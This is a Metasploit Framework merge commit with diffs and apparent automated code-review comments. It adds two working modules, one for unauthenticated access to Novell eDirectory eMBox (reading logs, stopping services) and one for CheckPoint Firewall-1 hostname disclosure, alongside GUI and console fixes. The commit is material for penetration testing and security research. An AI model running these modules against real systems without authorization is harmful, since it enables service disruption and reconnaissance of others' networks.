Merge remote branch 'upstream/master'

unstable
chao-mu 2011-12-16 19:44:13 -05:00
commit df0abd0273
12 changed files with 286 additions and 30 deletions

Binary file not shown.


@ -265,6 +265,7 @@ public class DbConnectDialog extends OptionsDialog {
token = s.next();
}
} catch (FileNotFoundException fnfox){
fnfox.printStackTrace();
}
showDefaults();
}

2
external/source/gui/msfguijava/src/msfgui/MainFrame.java vendored Normal file → Executable file

@ -265,6 +265,7 @@ public class MainFrame extends FrameView {
}
publish((Object)jobStrings);
} catch (MsfException msfEx) {
if(!MsfguiApp.shuttingDown || !msfEx.getMessage().contains("Connection refused"))
msfEx.printStackTrace();
publish("Error getting session list "+msfEx);
if(!msfEx.getMessage().contains("timed out")) // on timeout, just retry
@ -1655,6 +1656,7 @@ nameloop: for (int i = 0; i < names.length; i++) {
});
jobsList.addMouseListener( new PopupMouseListener() {
public void mouseReleased(MouseEvent e){
super.mouseReleased(e);
int indx = jobsList.locationToIndex(e.getPoint());
if (indx == -1)
return;


@ -3,8 +3,6 @@ package msfgui;
import java.awt.Component;
import java.awt.event.ActionEvent;
import java.awt.event.ActionListener;
import java.awt.event.FocusEvent;
import java.awt.event.FocusListener;
import java.awt.event.MouseEvent;
import java.io.File;
import java.io.IOException;
@ -199,7 +197,6 @@ public class MeterpFileBrowser extends MsfFrame {
/** Retrieves list of files. */
private void getFiles() {
//Set up locking so the console doesn't eat our output
if(!lock.tryLock())
lock.lock();
while(model.getRowCount() > 0)
@ -243,10 +240,8 @@ public class MeterpFileBrowser extends MsfFrame {
for(int i = 0; i < mainTable.getColumnCount(); i++)
if(mainTable.getColumnName(i).equals("Name"))
nameColumn = i;
if(nameColumn != -1){
if(nameColumn != -1)
mainTable.moveColumn(nameColumn, 0);
stop();
}
} catch (Exception ex) {
ex.printStackTrace();
if(ex.getMessage().toLowerCase().contains("unknown session"))


@ -103,7 +103,6 @@ public class OpenConnectionDialog extends javax.swing.JDialog {
String host = info.get("host").toString();
int port = Integer.parseInt(info.get("port").toString());
boolean ssl = Boolean.parseBoolean(info.get("ssl").toString());
String type = info.get("type").toString();
RpcConnection rpc = RpcConnection.getConn(username, password.toCharArray(), host, port, ssl);
if(javax.swing.JOptionPane.showConfirmDialog(null, "Connect to last remembered rpcd?") == javax.swing.JOptionPane.YES_OPTION)
return rpc;


@ -57,16 +57,6 @@ public class ProcessList extends MsfFrame {
this.rpcConn = rpcConn;
this.session = session;
this.lock = (ReentrantLock)sessionPopupMap.get(session.get("id")+"lock");
((DraggableTabbedPane)tabbedPane).setTabFocusListener(0, new FocusListener() {
public void focusGained(FocusEvent e) {
if(!lock.tryLock())
lock.lock();
}
public void focusLost(FocusEvent e) {
while(lock.getHoldCount() > 0)
lock.unlock();
}
});
//See if we need to move our tab
Map props = MsfguiApp.getPropertiesNode();
if(!props.get("tabWindowPreference").equals("window")){
@ -74,13 +64,12 @@ public class ProcessList extends MsfFrame {
(Component)sessionPopupMap.get(session.get("id")+"console")));
DraggableTabbedPane.show(mainPanel);
}
if(!lock.tryLock())
lock.lock();
listProcs();
}
/** Lists the processes that are running */
protected void listProcs() throws HeadlessException {
lock.lock();
if (runCommand("ps"))
return;
readTimer = new Timer(300, new ActionListener() {
@ -113,6 +102,7 @@ public class ProcessList extends MsfFrame {
readTimer.stop();
MsfguiApp.showMessage(null, ex.getMessage());
}
lock.unlock();
}
});
readTimer.start();
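Review bot: In `listProcs()` the lock taken by `lock.lock();` is still held on the early `return` after `if (runCommand("ps"))`, and the only `lock.unlock();` visible sits after the catch block in the timer's ActionListener rather than in a `finally` (the page has lost its +/- markers, so this assumes both lines are on the new side). Any path through that callback that skips the line leaves the session lock held, and the callback body is only partly inside the hunk, so this cannot be ruled out from here. `ReentrantLock.unlock()` must also run on the thread that locked, which holds only if `listProcs()` is always called on the same thread as the timer callback; a comment should state that. Suggest `if (runCommand("ps")) { lock.unlock(); return; }` and moving the callback's release into `finally { lock.unlock(); }`.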


@ -185,19 +185,61 @@ class Core
cmd_resource_help
return false
end
args.each do |res|
if not File.file? res
good_res = nil
if (File.file? res and File.readable? res)
good_res = res
elsif
# let's check to see if it's in the scripts/resource dir (like when tab completed)
[
::Msf::Config.script_directory + File::SEPARATOR + "resource",
::Msf::Config.user_script_directory + File::SEPARATOR + "resource"
].each do |dir|
res_path = dir + File::SEPARATOR + res
if (File.file?(res_path) and File.readable?(res_path))
good_res = res_path
break
end
end
end
if good_res
driver.load_resource(good_res)
else
print_error("#{res} is not a valid resource file")
next
end
driver.load_resource(res)
end
end
#
# Tab completion for the resource command
#
def cmd_resource_tabs(str, words)
return [] if words.length > 1
tab_complete_filenames(str, words)
tabs = []
#return tabs if words.length > 1
if ( str and str =~ /^#{Regexp.escape(File::SEPARATOR)}/ )
# then you are probably specifying a full path so let's just use normal file completion
return tab_complete_filenames(str,words)
elsif (not words[1] or not words[1].match(/^\//))
# then let's start tab completion in the scripts/resource directories
begin
[
::Msf::Config.script_directory + File::SEPARATOR + "resource",
::Msf::Config.user_script_directory + File::SEPARATOR + "resource"
].each do |dir|
next if not ::File.exist? dir
tabs += ::Dir.new(dir).find_all { |e|
path = dir + File::SEPARATOR + e
::File.file?(path) and File.readable?(path)
}
end
rescue Exception
end
else
tabs += tab_complete_filenames(str,words)
end
return tabs
end
def cmd_makerc_help
@ -902,7 +944,7 @@ class Core
if (path !~ /#{File::SEPARATOR}/)
plugin_file_name = path
# If the plugin isn't in the user direcotry (~/.msf3/plugins/), use the base
# If the plugin isn't in the user directory (~/.msf3/plugins/), use the base
path = Msf::Config.user_plugin_directory + File::SEPARATOR + plugin_file_name
if not File.exists?( path + ".rb" )
# If the following "path" doesn't exist it will be caught when we attempt to load
@ -2132,7 +2174,7 @@ class Core
# Returns the revision of the framework and console library
#
def cmd_version(*args)
ver = "$Revision$"
ver = "$Revision: 14065 $"
print_line("Framework: #{Msf::Framework::Version}.#{Msf::Framework::Revision.match(/ (.+?) \$/)[1]}")
print_line("Console : #{Msf::Framework::Version}.#{ver.match(/ (.+?) \$/)[1]}")
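Review bot: In `cmd_resource` the bare `elsif` has no condition of its own, so Ruby takes the following `[ ... ].each do |dir|` expression as the condition and the branch body is empty; the directory lookup runs only as a side effect of evaluating that condition, and `else` is what is meant. In `cmd_resource_tabs`, `rescue Exception` with an empty body also swallows `Interrupt` and `SystemExit`; `rescue ::StandardError` is enough for an unreadable directory. The second branch tests `words[1].match(/^\//)` with a hard-coded `/` while the first uses `File::SEPARATOR`. The directory listing is not filtered by `str`, so every readable file is offered whatever prefix was typed.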


@ -0,0 +1,156 @@
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Novell eDirectory eMBox Unauthenticated File Access',
'Description' => %q{
This module will access Novell eDirectory's eMBox service and can run the
following actions via the SOAP interface: GET_DN, READ_LOGS, LIST_SERVICES,
STOP_SERVICE, START_SERVICE, SET_LOGFILE.
},
'References' =>
[
[ 'CVE', '2008-0926' ],
[ 'BID', '28441' ],
[ 'OSVDB', '43690' ]
],
'Author' =>
[
'Nicob',
'MC', #Initial Metasploit module
'sinn3r'
],
'License' => MSF_LICENSE,
'Actions' =>
[
[
'GET_DN',
{
'Description' => 'Get DN',
'CMD' => 'novell.embox.connmgr.serverinfo',
'PATTERN' => /<ServerDN dt="Binary">(.*)<\/ServerDN>/,
'USE_PARAM' => false
}
],
[
'READ_LOGS',
{
'Description' => 'Read all the log files',
'CMD' => 'logger.readlog',
'PATTERN' => /<LogFileData>(.*)<\/LogFileData>/,
'USE_PARAM' => false
}
],
[
'LIST_SERVICES',
{
'Description' => 'List services',
'CMD' => 'novell.embox.service.getServiceList',
'PATTERN' => /<DSService:Message dt=\"Binary\">(.*)<\/DSService:Message>/,
'USE_PARAM' => false
}
],
[
'STOP_SERVICE',
{
'Description' => 'Stop a service',
'CMD' => 'novell.embox.service.stopService',
'PATTERN' => /<DSService:Message dt="Binary">(.*)<\/DSService:Message>/,
'PARAM' => '<Parameters><params xmlns:DSService="service.dtd">'+
'<DSService:moduleName>__PARAM__</DSService:moduleName>'+
'</params></Parameters>',
'USE_PARAM' => true
}
],
[
'START_SERVICE',
{
'Description' => 'Start a service',
'CMD' => 'novell.embox.service.startService',
'PATTERN' => /<DSService:Message dt="Binary">(.*)<\/DSService:Message>/,
'PARAM' => '<Parameters>' +
'<params xmlns:DSService="service.dtd">' +
'<DSService:moduleName>__PARAM__</DSService:moduleName>'+
'</params></Parameters>',
'USE_PARAM' => true
}
],
[
'SET_LOGFILE',
{
'Description' => 'Read Log File',
'CMD' => 'logger.setloginfo',
'PATTERN' => /<Logger:Message dt="Binary">(.*)<\/Logger:Message>/,
'PARAM' => '<Parameters><params><logFile>__PARAM__</logFile>'+
'<logOptionAppend/></params></Parameters>',
'USE_PARAM' => true
}
]
],
'DefaultAction' => 'LIST_SERVICES'
))
register_options(
[
Opt::RPORT(8028),
OptString.new("PARAM", [false, 'Specify a parameter for the action'])
], self.class)
end
def run
if action.opts['USE_PARAM']
if datastore['PARAM'].nil? or datastore['PARAM'].empty?
print_error("You must supply a parameter for action: #{action.name}")
return
else
param = action.opts['PARAM'].gsub(/__PARAM__/, datastore['PARAM'])
end
else
param = '<Parameters><params/></Parameters>'
end
template = %Q|<?xml version="1.0"?>
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/">
<SOAP-ENV:Header/>
<SOAP-ENV:Body>
<dispatch>
<Action>#{action.opts['CMD']}</Action>
<Object/>#{param}</dispatch>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>|
template = template.gsub(/^\t\t/, '')
template = template.gsub(/\n/, '')
connect
print_status("Sending command: #{action.name}...")
res = send_request_cgi({
'method' => 'POST',
'uri' => '/SOAP',
'data' => template + "\n\n",
'headers' =>
{
'Content-Type' => 'text/xml',
'SOAPAction' => "\"" + Rex::Text.rand_text_alpha_upper(rand(25) + 1) + "\"",
}
}, 25)
raw_data = res.body.scan(/#{action.opts['PATTERN']}/).flatten[0]
print_line("\n" + Rex::Text.decode_base64(raw_data))
disconnect
end
end
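Review bot: `run` calls `res.body` without checking that `send_request_cgi` returned a response, and hands `raw_data` to `Rex::Text.decode_base64` even when the action's `PATTERN` did not match. A timeout or an unexpected reply therefore most likely ends in a `NoMethodError` on nil rather than a readable message. Guard both with something like `if res.nil? or res.body.nil?` followed by a `print_error` and `return`, and the same for `raw_data.nil?`; `disconnect` is skipped on those paths, so it belongs in an `ensure`. On the documentation side, the `SET_LOGFILE` action is described as 'Read Log File', which does not match its `logger.setloginfo` command. The module description should also say that the STOP_SERVICE, START_SERVICE and SET_LOGFILE actions change state on the remote service.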


@ -0,0 +1,69 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'CheckPoint Firewall-1 Topology Service Hostname Disclosure',
'Description' => %q{
This module sends a query to the TCP port 264 on CheckPoint
firewalls to obtain the firewall name and management station
(such as SmartCenter) name.
},
'Author' => [ 'patrick' ],
'Version' => '$Revision$',
'References' =>
[
# patrickw - None? Stumbled across, probably an old bug/feature but unsure.
[ 'URL', 'http://www.osisecurity.com.au/advisories/' ],
]
))
register_options(
[
Opt::RPORT(264),
], self.class)
end
def autofilter
false
end
def run
print_status("Attempting to contact Checkpoint FW1 Topology service...")
connect
sock.put("\x51\x00\x00\x00")
sock.put("\x00\x00\x00\x21")
res = sock.get(4)
if (res == "Y\x00\x00\x00")
print_good("Appears to be a CheckPoint Firewall...")
sock.put("\x00\x00\x00\x0bsecuremote\x00")
res = sock.get_once
if (res =~ /CN\=(.+),O\=(.+)\./i)
print_good("Firewall Host: #{$1}")
print_good("SmartCenter Host: #{$2}")
end
else
print_error("Unexpected response:\r\n#{res}")
end
disconnect
end
end
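Review bot: `print_error("Unexpected response:\r\n#{res}")` writes bytes received from the remote service straight to the operator's console, and `$1`/`$2` from the second reply are printed the same way, so whatever is listening on the port can place terminal control sequences in that output. Print untrusted data escaped, e.g. `print_error("Unexpected response: #{res.inspect}")`. When the second reply does not match the `CN=...,O=...` pattern the module prints nothing, so an `else` with a `print_error` would make that outcome visible. `disconnect` is reached only on the normal path; a `begin ... ensure disconnect end` around the body would close the socket on errors too.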


@ -34,6 +34,7 @@ class Metasploit3 < Msf::Exploit::Remote
],
'References' =>
[
[ 'OSVDB', '77556'],
[ 'URL', 'http://www.exploit-db.com/exploits/18213/' ],
[ 'URL', 'http://traqproject.org/' ],
],


@ -29,6 +29,7 @@ class Metasploit3 < Msf::Exploit::Remote
],
'References' =>
[
[ 'OSVDB', '77387'],
[ 'URL', 'http://aluigi.altervista.org/adv/codesys_1-adv.txt' ],
[ 'URL', 'http://www.exploit-db.com/exploits/18187/' ],
[ 'URL', 'http://www.us-cert.gov/control_systems/pdf/ICS-ALERT-11-336-01A.pdf' ]


@ -42,7 +42,7 @@ class Metasploit3 < Msf::Post
if not ::File.exists?(datastore['RESOURCE'])
raise "Resource File does not exists!"
else
::File.open(datastore['RESOURCE'], "br").each_line do |cmd|
::File.open(datastore['RESOURCE'], "rb").each_line do |cmd|
next if cmd.strip.length < 1
next if cmd[0,1] == "#"
begin
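Review bot: `::File.open(datastore['RESOURCE'], "rb").each_line` never closes the file handle, because `open` is called without a block. The block form releases it when the loop ends: `::File.open(datastore['RESOURCE'], "rb") { |f| f.each_line { |cmd| ... } }`. The `::File.exists?` check followed by a separate open also leaves a window in which the file can disappear or become unreadable, so rescuing `::Errno::ENOENT` and `::Errno::EACCES` around the open would be more reliable than the pre-check. The loop body continues outside the hunk.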